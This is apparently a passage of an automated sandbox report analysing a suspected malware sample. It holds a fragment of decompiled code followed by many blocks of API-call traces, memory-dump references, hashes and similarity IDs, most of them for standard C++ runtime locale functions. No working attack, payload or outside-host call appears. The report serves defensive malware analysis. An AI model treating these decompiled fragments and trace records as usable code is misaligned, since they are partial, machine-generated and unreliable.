                                                                                                                          						_t43 = E04CD26DD(_t36, _t33);
                                                                                                                          						if(_t43 != 0) {
                                                                                                                          							E04CD4AAB(_t36);
                                                                                                                          							_t36 = _t43;
                                                                                                                          						}
                                                                                                                          					}
                                                                                                                          					E04CD4AAB(_t28);
                                                                                                                          				}
                                                                                                                          				return _t36;
                                                                                                                          			}















                                                                                                                          APIs
                                                                                                                            • Part of subcall function 04CD43A8: lstrlen.KERNEL32(00000000,00000000,00000000,745EC740,?,?,?,04CD198E,253D7325,00000000,00000000,745EC740,?,?,04CD4653,?), ref: 04CD440F
                                                                                                                            • Part of subcall function 04CD43A8: sprintf.NTDLL ref: 04CD4430
                                                                                                                          • lstrlen.KERNEL32(00000000,253D7325,00000000,00000000,745EC740,?,?,04CD4653,?,058B95B0), ref: 04CD199F
                                                                                                                          • lstrlen.KERNEL32(?,?,?,04CD4653,?,058B95B0), ref: 04CD19A7
                                                                                                                            • Part of subcall function 04CD75F6: RtlAllocateHeap.NTDLL(00000000,00000000,04CD4F70), ref: 04CD7602
                                                                                                                          • strcpy.NTDLL ref: 04CD19BE
                                                                                                                          • lstrcat.KERNEL32(00000000,?), ref: 04CD19C9
                                                                                                                            • Part of subcall function 04CD5601: lstrlen.KERNEL32(?,?,?,?,00000001,00000000,00000000,?,04CD19D8,00000000,?,?,?,04CD4653,?,058B95B0), ref: 04CD5618
                                                                                                                            • Part of subcall function 04CD4AAB: RtlFreeHeap.NTDLL(00000000,00000000,04CD5012,00000000,?,?,00000000), ref: 04CD4AB7
                                                                                                                          • StrTrimA.SHLWAPI(00000000,=,00000000,00000000,?,?,?,04CD4653,?,058B95B0), ref: 04CD19E6
                                                                                                                            • Part of subcall function 04CD756E: lstrlen.KERNEL32(?,00000000,00000000,00000000,?,04CD19F2,00000000,?,?,04CD4653,?,058B95B0), ref: 04CD7578
                                                                                                                            • Part of subcall function 04CD756E: _snprintf.NTDLL ref: 04CD75D6
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.1186676495.0000000004CD1000.00000020.00020000.sdmp, Offset: 04CD0000, based on PE: true
                                                                                                                          • Associated: 00000003.00000002.1186632523.0000000004CD0000.00000004.00020000.sdmp
                                                                                                                          • Associated: 00000003.00000002.1186738951.0000000004CDC000.00000002.00020000.sdmp
                                                                                                                          • Associated: 00000003.00000002.1186771530.0000000004CDD000.00000004.00020000.sdmp
                                                                                                                          • Associated: 00000003.00000002.1186799426.0000000004CDF000.00000002.00020000.sdmp
                                                                                                                          Similarity
                                                                                                                          • API ID: lstrlen$Heap$AllocateFreeTrim_snprintflstrcatsprintfstrcpy
                                                                                                                          • String ID: =
                                                                                                                          • API String ID: 2864389247-1428090586
                                                                                                                          • Opcode ID: a4e5c99049cc9d6a39d5836708fb3a69e912421a4d0354aa1b4c2c0946cc9b38
                                                                                                                          • Instruction ID: 9cec96b379794102a93e339e37271d0256a8c196444c1b5468e36a16ee588804
                                                                                                                          • Opcode Fuzzy Hash: a4e5c99049cc9d6a39d5836708fb3a69e912421a4d0354aa1b4c2c0946cc9b38
                                                                                                                          • Instruction Fuzzy Hash: E111E937902625779712BBB48CC4C6F37AFDE856687094126F709EB200DE34FD02A7A5
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          APIs
                                                                                                                            • Part of subcall function 6E33D196: _free.LIBCMT ref: 6E33D1BB
                                                                                                                          • _free.LIBCMT ref: 6E33D4F9
                                                                                                                            • Part of subcall function 6E331434: HeapFree.KERNEL32(00000000,00000000,?,6E33D1C0,?,00000000,?,?,?,6E33D4C4,?,00000007,?,?,6E33B43B,?), ref: 6E33144A
                                                                                                                            • Part of subcall function 6E331434: GetLastError.KERNEL32(?,?,6E33D1C0,?,00000000,?,?,?,6E33D4C4,?,00000007,?,?,6E33B43B,?,?), ref: 6E33145C
                                                                                                                          • _free.LIBCMT ref: 6E33D504
                                                                                                                          • _free.LIBCMT ref: 6E33D50F
                                                                                                                          • _free.LIBCMT ref: 6E33D563
                                                                                                                          • _free.LIBCMT ref: 6E33D56E
                                                                                                                          • _free.LIBCMT ref: 6E33D579
                                                                                                                          • _free.LIBCMT ref: 6E33D584
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.1187430880.000000006E2E0000.00000020.00020000.sdmp, Offset: 6E2E0000, based on PE: false
                                                                                                                          Similarity
                                                                                                                          • API ID: _free$ErrorFreeHeapLast
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 776569668-0
                                                                                                                          • Opcode ID: 39b13820a97e8b63a2bd5758ecc74a4ff61c4819cdfe69e10f1538665c390981
                                                                                                                          • Instruction ID: 1c775a92a51b382890f9de72f61c385eb80da3d32ce688500c37143a9a4e3282
                                                                                                                          • Opcode Fuzzy Hash: 39b13820a97e8b63a2bd5758ecc74a4ff61c4819cdfe69e10f1538665c390981
                                                                                                                          • Instruction Fuzzy Hash: 2A118E31951BA4ABE660ABF0CC05FCB77BDAF00708FD04D14E2DBA6052DB35F5188AA0
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          APIs
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.1187430880.000000006E2E0000.00000020.00020000.sdmp, Offset: 6E2E0000, based on PE: false
                                                                                                                          Similarity
                                                                                                                          • API ID: Maklocstr$Maklocchr
                                                                                                                          • String ID: 4r6n
                                                                                                                          • API String ID: 2020259771-711905790
                                                                                                                          • Opcode ID: 5715afb7dd833c9ab8a1d7bd1d9ed5f586bdbe744dc4d6958643cb0641373ccb
                                                                                                                          • Instruction ID: 44fdaad62bf1ba765888c7cf57a7af8276d4cc1be8088f3e8da6d75041238d82
                                                                                                                          • Opcode Fuzzy Hash: 5715afb7dd833c9ab8a1d7bd1d9ed5f586bdbe744dc4d6958643cb0641373ccb
                                                                                                                          • Instruction Fuzzy Hash: C1118CB1990749BFE720CBE5D890F52F7ACEF08614F04892AF244CB640D3A5F95687E4
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          APIs
                                                                                                                          • __EH_prolog3.LIBCMT ref: 6E2F1C9D
                                                                                                                          • std::_Lockit::_Lockit.LIBCPMT ref: 6E2F1CA7
                                                                                                                          • int.LIBCPMT ref: 6E2F1CBE
                                                                                                                            • Part of subcall function 6E2F207B: std::_Lockit::_Lockit.LIBCPMT ref: 6E2F208C
                                                                                                                            • Part of subcall function 6E2F207B: std::_Lockit::~_Lockit.LIBCPMT ref: 6E2F20A6
                                                                                                                          • numpunct.LIBCPMT ref: 6E2F1CE1
                                                                                                                          • std::_Facet_Register.LIBCPMT ref: 6E2F1CF8
                                                                                                                          • std::_Lockit::~_Lockit.LIBCPMT ref: 6E2F1D18
                                                                                                                          • Concurrency::cancel_current_task.LIBCPMT ref: 6E2F1D25
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.1187430880.000000006E2E0000.00000020.00020000.sdmp, Offset: 6E2E0000, based on PE: false
                                                                                                                          Similarity
                                                                                                                          • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Registernumpunct
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 3064348918-0
                                                                                                                          • Opcode ID: ed62022c4a3d4973d3804e374bc9a9f4b5258df4367cded4524c1fb11d1d0cee
                                                                                                                          • Instruction ID: dc030ce16e7f019918c1874105f01bca27bf6eacca2a3cc1084a8cedd421c046
                                                                                                                          • Opcode Fuzzy Hash: ed62022c4a3d4973d3804e374bc9a9f4b5258df4367cded4524c1fb11d1d0cee
                                                                                                                          • Instruction Fuzzy Hash: D311E0B694011ECBCF01DBE4C954BEDF7BAAF46318F644908D4106B281DF749947CB91
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          APIs
                                                                                                                          • __EH_prolog3.LIBCMT ref: 6E2F7615
                                                                                                                          • std::_Lockit::_Lockit.LIBCPMT ref: 6E2F761F
                                                                                                                          • int.LIBCPMT ref: 6E2F7636
                                                                                                                            • Part of subcall function 6E2F207B: std::_Lockit::_Lockit.LIBCPMT ref: 6E2F208C
                                                                                                                            • Part of subcall function 6E2F207B: std::_Lockit::~_Lockit.LIBCPMT ref: 6E2F20A6
                                                                                                                          • moneypunct.LIBCPMT ref: 6E2F7659
                                                                                                                          • std::_Facet_Register.LIBCPMT ref: 6E2F7670
                                                                                                                          • std::_Lockit::~_Lockit.LIBCPMT ref: 6E2F7690
                                                                                                                          • Concurrency::cancel_current_task.LIBCPMT ref: 6E2F769D
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.1187430880.000000006E2E0000.00000020.00020000.sdmp, Offset: 6E2E0000, based on PE: false
                                                                                                                          Similarity
                                                                                                                          • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Registermoneypunct
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 3376033448-0
                                                                                                                          • Opcode ID: 2d2c9ead8b5d08dd4f2804e0d0b800f8b9a73c6c1f052ab573b1c80bcd82dbd9
                                                                                                                          • Instruction ID: feb0711a4f26171065421143660aa5e74c0ead1d9278157970b144ef225e1303
                                                                                                                          • Opcode Fuzzy Hash: 2d2c9ead8b5d08dd4f2804e0d0b800f8b9a73c6c1f052ab573b1c80bcd82dbd9
                                                                                                                          • Instruction Fuzzy Hash: C901ED7A84011EDBCF01DBE8C854AEEF7BBAF85328F250819D4116B2C0DF7099468B90
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          APIs
                                                                                                                          • __EH_prolog3.LIBCMT ref: 6E2F76AA
                                                                                                                          • std::_Lockit::_Lockit.LIBCPMT ref: 6E2F76B4
                                                                                                                          • int.LIBCPMT ref: 6E2F76CB
                                                                                                                            • Part of subcall function 6E2F207B: std::_Lockit::_Lockit.LIBCPMT ref: 6E2F208C
                                                                                                                            • Part of subcall function 6E2F207B: std::_Lockit::~_Lockit.LIBCPMT ref: 6E2F20A6
                                                                                                                          • moneypunct.LIBCPMT ref: 6E2F76EE
                                                                                                                          • std::_Facet_Register.LIBCPMT ref: 6E2F7705
                                                                                                                          • std::_Lockit::~_Lockit.LIBCPMT ref: 6E2F7725
                                                                                                                          • Concurrency::cancel_current_task.LIBCPMT ref: 6E2F7732
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.1187430880.000000006E2E0000.00000020.00020000.sdmp, Offset: 6E2E0000, based on PE: false
                                                                                                                          Similarity
                                                                                                                          • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Registermoneypunct
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 3376033448-0
                                                                                                                          • Opcode ID: 0c694bced1b854ab9ac9bbb71301d8ccadba942549df713ff02291a0cc47124d
                                                                                                                          • Instruction ID: 2485fe04350a337dd3526895c08f5e5d9e0543972f7db0376a5239c41dc83713
                                                                                                                          • Opcode Fuzzy Hash: 0c694bced1b854ab9ac9bbb71301d8ccadba942549df713ff02291a0cc47124d
                                                                                                                          • Instruction Fuzzy Hash: F701AD7A99051EDBCF01DBE4C954AEEF7BBAF86328F150809D8116B280DF709907CB91
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          APIs
                                                                                                                          • __EH_prolog3.LIBCMT ref: 6E2F773F
                                                                                                                          • std::_Lockit::_Lockit.LIBCPMT ref: 6E2F7749
                                                                                                                          • int.LIBCPMT ref: 6E2F7760
                                                                                                                            • Part of subcall function 6E2F207B: std::_Lockit::_Lockit.LIBCPMT ref: 6E2F208C
                                                                                                                            • Part of subcall function 6E2F207B: std::_Lockit::~_Lockit.LIBCPMT ref: 6E2F20A6
                                                                                                                          • moneypunct.LIBCPMT ref: 6E2F7783
                                                                                                                          • std::_Facet_Register.LIBCPMT ref: 6E2F779A
                                                                                                                          • std::_Lockit::~_Lockit.LIBCPMT ref: 6E2F77BA
                                                                                                                          • Concurrency::cancel_current_task.LIBCPMT ref: 6E2F77C7
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.1187430880.000000006E2E0000.00000020.00020000.sdmp, Offset: 6E2E0000, based on PE: false
                                                                                                                          Similarity
                                                                                                                          • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Registermoneypunct
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 3376033448-0
                                                                                                                          • Opcode ID: 8e3467f39db19a354c7454f66d08effc2158c2688d542488c51830b629efc314
                                                                                                                          • Instruction ID: d15846af9ef75ffae30640608132a29f4147f921fb5d6eeb0343ceb669aedce5
                                                                                                                          • Opcode Fuzzy Hash: 8e3467f39db19a354c7454f66d08effc2158c2688d542488c51830b629efc314
                                                                                                                          • Instruction Fuzzy Hash: D701ED7A85011ECBCF01DBE4C954AEEF7BBAF49318F100809D8116B290DF709A068790
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          APIs
                                                                                                                          • __EH_prolog3.LIBCMT ref: 6E2F6F19
                                                                                                                          • std::_Lockit::_Lockit.LIBCPMT ref: 6E2F6F23
                                                                                                                          • int.LIBCPMT ref: 6E2F6F3A
                                                                                                                            • Part of subcall function 6E2F207B: std::_Lockit::_Lockit.LIBCPMT ref: 6E2F208C
                                                                                                                            • Part of subcall function 6E2F207B: std::_Lockit::~_Lockit.LIBCPMT ref: 6E2F20A6
                                                                                                                          • codecvt.LIBCPMT ref: 6E2F6F5D
                                                                                                                          • std::_Facet_Register.LIBCPMT ref: 6E2F6F74
                                                                                                                          • std::_Lockit::~_Lockit.LIBCPMT ref: 6E2F6F94
                                                                                                                          • Concurrency::cancel_current_task.LIBCPMT ref: 6E2F6FA1
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.1187430880.000000006E2E0000.00000020.00020000.sdmp, Offset: 6E2E0000, based on PE: false
                                                                                                                          Similarity
                                                                                                                          • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Registercodecvt
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2133458128-0
                                                                                                                          • Opcode ID: d740a2879b316c91fb22ee085e8c72e2f1b26c1970e2ad0f68978f64f0ad0c2a
                                                                                                                          • Instruction ID: 6a7909e63cdca022f7b07edfeda72980f781592a60884d48788f4d4456bb46de
                                                                                                                          • Opcode Fuzzy Hash: d740a2879b316c91fb22ee085e8c72e2f1b26c1970e2ad0f68978f64f0ad0c2a
                                                                                                                          • Instruction Fuzzy Hash: F101007A94011ECBCF01DBE4CAA4BEEF7BBAF85328F100909D4126B290DF749D028781
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          APIs
                                                                                                                          • __EH_prolog3.LIBCMT ref: 6E2F6FAE
                                                                                                                          • std::_Lockit::_Lockit.LIBCPMT ref: 6E2F6FB8
                                                                                                                          • int.LIBCPMT ref: 6E2F6FCF
                                                                                                                            • Part of subcall function 6E2F207B: std::_Lockit::_Lockit.LIBCPMT ref: 6E2F208C
                                                                                                                            • Part of subcall function 6E2F207B: std::_Lockit::~_Lockit.LIBCPMT ref: 6E2F20A6
                                                                                                                          • codecvt.LIBCPMT ref: 6E2F6FF2
                                                                                                                          • std::_Facet_Register.LIBCPMT ref: 6E2F7009
                                                                                                                          • std::_Lockit::~_Lockit.LIBCPMT ref: 6E2F7029
                                                                                                                          • Concurrency::cancel_current_task.LIBCPMT ref: 6E2F7036
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.1187430880.000000006E2E0000.00000020.00020000.sdmp, Offset: 6E2E0000, based on PE: false
                                                                                                                          Similarity
                                                                                                                          • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Registercodecvt
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2133458128-0
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          APIs
                                                                                                                          • __EH_prolog3.LIBCMT ref: 6E2F77D4
                                                                                                                          • std::_Lockit::_Lockit.LIBCPMT ref: 6E2F77DE
                                                                                                                          • int.LIBCPMT ref: 6E2F77F5
                                                                                                                            • Part of subcall function 6E2F207B: std::_Lockit::_Lockit.LIBCPMT ref: 6E2F208C
                                                                                                                            • Part of subcall function 6E2F207B: std::_Lockit::~_Lockit.LIBCPMT ref: 6E2F20A6
                                                                                                                          • moneypunct.LIBCPMT ref: 6E2F7818
                                                                                                                          • std::_Facet_Register.LIBCPMT ref: 6E2F782F
                                                                                                                          • std::_Lockit::~_Lockit.LIBCPMT ref: 6E2F784F
                                                                                                                          • Concurrency::cancel_current_task.LIBCPMT ref: 6E2F785C
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.1187430880.000000006E2E0000.00000020.00020000.sdmp, Offset: 6E2E0000, based on PE: false
                                                                                                                          Similarity
                                                                                                                          • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Registermoneypunct
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 3376033448-0
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          APIs
                                                                                                                          • __EH_prolog3.LIBCMT ref: 6E2F1A49
                                                                                                                          • std::_Lockit::_Lockit.LIBCPMT ref: 6E2F1A53
                                                                                                                          • int.LIBCPMT ref: 6E2F1A6A
                                                                                                                            • Part of subcall function 6E2F207B: std::_Lockit::_Lockit.LIBCPMT ref: 6E2F208C
                                                                                                                            • Part of subcall function 6E2F207B: std::_Lockit::~_Lockit.LIBCPMT ref: 6E2F20A6
                                                                                                                          • codecvt.LIBCPMT ref: 6E2F1A8D
                                                                                                                          • std::_Facet_Register.LIBCPMT ref: 6E2F1AA4
                                                                                                                          • std::_Lockit::~_Lockit.LIBCPMT ref: 6E2F1AC4
                                                                                                                          • Concurrency::cancel_current_task.LIBCPMT ref: 6E2F1AD1
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.1187430880.000000006E2E0000.00000020.00020000.sdmp, Offset: 6E2E0000, based on PE: false
                                                                                                                          Similarity
                                                                                                                          • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Registercodecvt
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2133458128-0
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          APIs
                                                                                                                          • __EH_prolog3.LIBCMT ref: 6E2F7ABD
                                                                                                                          • std::_Lockit::_Lockit.LIBCPMT ref: 6E2F7AC7
                                                                                                                          • int.LIBCPMT ref: 6E2F7ADE
                                                                                                                            • Part of subcall function 6E2F207B: std::_Lockit::_Lockit.LIBCPMT ref: 6E2F208C
                                                                                                                            • Part of subcall function 6E2F207B: std::_Lockit::~_Lockit.LIBCPMT ref: 6E2F20A6
                                                                                                                          • numpunct.LIBCPMT ref: 6E2F7B01
                                                                                                                          • std::_Facet_Register.LIBCPMT ref: 6E2F7B18
                                                                                                                          • std::_Lockit::~_Lockit.LIBCPMT ref: 6E2F7B38
                                                                                                                          • Concurrency::cancel_current_task.LIBCPMT ref: 6E2F7B45
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.1187430880.000000006E2E0000.00000020.00020000.sdmp, Offset: 6E2E0000, based on PE: false
                                                                                                                          Similarity
                                                                                                                          • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Registernumpunct
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 3064348918-0
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          APIs
                                                                                                                          • __EH_prolog3.LIBCMT ref: 6E2F7297
                                                                                                                          • std::_Lockit::_Lockit.LIBCPMT ref: 6E2F72A1
                                                                                                                          • int.LIBCPMT ref: 6E2F72B8
                                                                                                                            • Part of subcall function 6E2F207B: std::_Lockit::_Lockit.LIBCPMT ref: 6E2F208C
                                                                                                                            • Part of subcall function 6E2F207B: std::_Lockit::~_Lockit.LIBCPMT ref: 6E2F20A6
                                                                                                                          • messages.LIBCPMT ref: 6E2F72DB
                                                                                                                          • std::_Facet_Register.LIBCPMT ref: 6E2F72F2
                                                                                                                          • std::_Lockit::~_Lockit.LIBCPMT ref: 6E2F7312
                                                                                                                          • Concurrency::cancel_current_task.LIBCPMT ref: 6E2F731F
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.1187430880.000000006E2E0000.00000020.00020000.sdmp, Offset: 6E2E0000, based on PE: false
                                                                                                                          Similarity
                                                                                                                          • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Registermessages
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 958335874-0
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          APIs
                                                                                                                          • __EH_prolog3.LIBCMT ref: 6E2F1ADE
                                                                                                                          • std::_Lockit::_Lockit.LIBCPMT ref: 6E2F1AE8
                                                                                                                          • int.LIBCPMT ref: 6E2F1AFF
                                                                                                                            • Part of subcall function 6E2F207B: std::_Lockit::_Lockit.LIBCPMT ref: 6E2F208C
                                                                                                                            • Part of subcall function 6E2F207B: std::_Lockit::~_Lockit.LIBCPMT ref: 6E2F20A6
                                                                                                                          • ctype.LIBCPMT ref: 6E2F1B22
                                                                                                                          • std::_Facet_Register.LIBCPMT ref: 6E2F1B39
                                                                                                                          • std::_Lockit::~_Lockit.LIBCPMT ref: 6E2F1B59
                                                                                                                          • Concurrency::cancel_current_task.LIBCPMT ref: 6E2F1B66
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.1187430880.000000006E2E0000.00000020.00020000.sdmp, Offset: 6E2E0000, based on PE: false
                                                                                                                          Similarity
                                                                                                                          • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Registerctype
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2958136301-0
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          APIs
                                                                                                                          • __EH_prolog3.LIBCMT ref: 6E2F732C
                                                                                                                          • std::_Lockit::_Lockit.LIBCPMT ref: 6E2F7336
                                                                                                                          • int.LIBCPMT ref: 6E2F734D
                                                                                                                            • Part of subcall function 6E2F207B: std::_Lockit::_Lockit.LIBCPMT ref: 6E2F208C
                                                                                                                            • Part of subcall function 6E2F207B: std::_Lockit::~_Lockit.LIBCPMT ref: 6E2F20A6
                                                                                                                          • messages.LIBCPMT ref: 6E2F7370
                                                                                                                          • std::_Facet_Register.LIBCPMT ref: 6E2F7387
                                                                                                                          • std::_Lockit::~_Lockit.LIBCPMT ref: 6E2F73A7
                                                                                                                          • Concurrency::cancel_current_task.LIBCPMT ref: 6E2F73B4
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.1187430880.000000006E2E0000.00000020.00020000.sdmp, Offset: 6E2E0000, based on PE: false
                                                                                                                          Similarity
                                                                                                                          • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Registermessages
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 958335874-0
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          APIs
                                                                                                                          • __EH_prolog3.LIBCMT ref: 6E2F7B52
                                                                                                                          • std::_Lockit::_Lockit.LIBCPMT ref: 6E2F7B5C
                                                                                                                          • int.LIBCPMT ref: 6E2F7B73
                                                                                                                            • Part of subcall function 6E2F207B: std::_Lockit::_Lockit.LIBCPMT ref: 6E2F208C
                                                                                                                            • Part of subcall function 6E2F207B: std::_Lockit::~_Lockit.LIBCPMT ref: 6E2F20A6
                                                                                                                          • numpunct.LIBCPMT ref: 6E2F7B96
                                                                                                                          • std::_Facet_Register.LIBCPMT ref: 6E2F7BAD
                                                                                                                          • std::_Lockit::~_Lockit.LIBCPMT ref: 6E2F7BCD
                                                                                                                          • Concurrency::cancel_current_task.LIBCPMT ref: 6E2F7BDA
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.1187430880.000000006E2E0000.00000020.00020000.sdmp, Offset: 6E2E0000, based on PE: false
                                                                                                                          Similarity
                                                                                                                          • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Registernumpunct
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 3064348918-0
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          APIs
                                                                                                                          • __EH_prolog3.LIBCMT ref: 6E2F7043
                                                                                                                          • std::_Lockit::_Lockit.LIBCPMT ref: 6E2F704D
                                                                                                                          • int.LIBCPMT ref: 6E2F7064
                                                                                                                            • Part of subcall function 6E2F207B: std::_Lockit::_Lockit.LIBCPMT ref: 6E2F208C
                                                                                                                            • Part of subcall function 6E2F207B: std::_Lockit::~_Lockit.LIBCPMT ref: 6E2F20A6
                                                                                                                          • collate.LIBCPMT ref: 6E2F7087
                                                                                                                          • std::_Facet_Register.LIBCPMT ref: 6E2F709E
                                                                                                                          • std::_Lockit::~_Lockit.LIBCPMT ref: 6E2F70BE
                                                                                                                          • Concurrency::cancel_current_task.LIBCPMT ref: 6E2F70CB
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.1187430880.000000006E2E0000.00000020.00020000.sdmp, Offset: 6E2E0000, based on PE: false
                                                                                                                          Similarity
                                                                                                                          • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Registercollate
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 1767075461-0
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          APIs
                                                                                                                          • __EH_prolog3.LIBCMT ref: 6E2F70D8
                                                                                                                          • std::_Lockit::_Lockit.LIBCPMT ref: 6E2F70E2
                                                                                                                          • int.LIBCPMT ref: 6E2F70F9
                                                                                                                            • Part of subcall function 6E2F207B: std::_Lockit::_Lockit.LIBCPMT ref: 6E2F208C
                                                                                                                            • Part of subcall function 6E2F207B: std::_Lockit::~_Lockit.LIBCPMT ref: 6E2F20A6
                                                                                                                          • collate.LIBCPMT ref: 6E2F711C
                                                                                                                          • std::_Facet_Register.LIBCPMT ref: 6E2F7133
                                                                                                                          • std::_Lockit::~_Lockit.LIBCPMT ref: 6E2F7153
                                                                                                                          • Concurrency::cancel_current_task.LIBCPMT ref: 6E2F7160
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.1187430880.000000006E2E0000.00000020.00020000.sdmp, Offset: 6E2E0000, based on PE: false
                                                                                                                          Similarity
                                                                                                                          • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Registercollate
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 1767075461-0
                                                                                                                          • Opcode ID: e10b029a6847a6a9741e0e8324c4ec9e95720e8e4b15f73491d5a286d7a7b27b
                                                                                                                          • Instruction ID: 2045e977f67fcf543bb4025119392979bfef4e631a47c23b50918380a0868e7f
                                                                                                                          • Opcode Fuzzy Hash: e10b029a6847a6a9741e0e8324c4ec9e95720e8e4b15f73491d5a286d7a7b27b
                                                                                                                          • Instruction Fuzzy Hash: AB01AD7A98051EDBCF05DBE4D854AEEBB7BBF41318F140919D4106B3C0DF709A0A8781
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          APIs
                                                                                                                          • __EH_prolog3.LIBCMT ref: 6E2F716D
                                                                                                                          • std::_Lockit::_Lockit.LIBCPMT ref: 6E2F7177
                                                                                                                          • int.LIBCPMT ref: 6E2F718E
                                                                                                                            • Part of subcall function 6E2F207B: std::_Lockit::_Lockit.LIBCPMT ref: 6E2F208C
                                                                                                                            • Part of subcall function 6E2F207B: std::_Lockit::~_Lockit.LIBCPMT ref: 6E2F20A6
                                                                                                                          • ctype.LIBCPMT ref: 6E2F71B1
                                                                                                                          • std::_Facet_Register.LIBCPMT ref: 6E2F71C8
                                                                                                                          • std::_Lockit::~_Lockit.LIBCPMT ref: 6E2F71E8
                                                                                                                          • Concurrency::cancel_current_task.LIBCPMT ref: 6E2F71F5
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.1187430880.000000006E2E0000.00000020.00020000.sdmp, Offset: 6E2E0000, based on PE: false
                                                                                                                          Similarity
                                                                                                                          • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Registerctype
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2958136301-0
                                                                                                                          • Opcode ID: 648c8987bea7c7cb035647b4101f8fc82f4583b4844d610237bd14caa7cc5c3e
                                                                                                                          • Instruction ID: 0947fdf29a95a29cea795a3a45b72c2f3d297a1d5a38680d9d8211fd391d6431
                                                                                                                          • Opcode Fuzzy Hash: 648c8987bea7c7cb035647b4101f8fc82f4583b4844d610237bd14caa7cc5c3e
                                                                                                                          • Instruction Fuzzy Hash: 9C01AD7A95051EDBCF01DBE4D954AEEFBBBAF82718F150909D4106B280DF709A0B8B91
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          APIs
                                                                                                                          • __EH_prolog3.LIBCMT ref: 6E2F7202
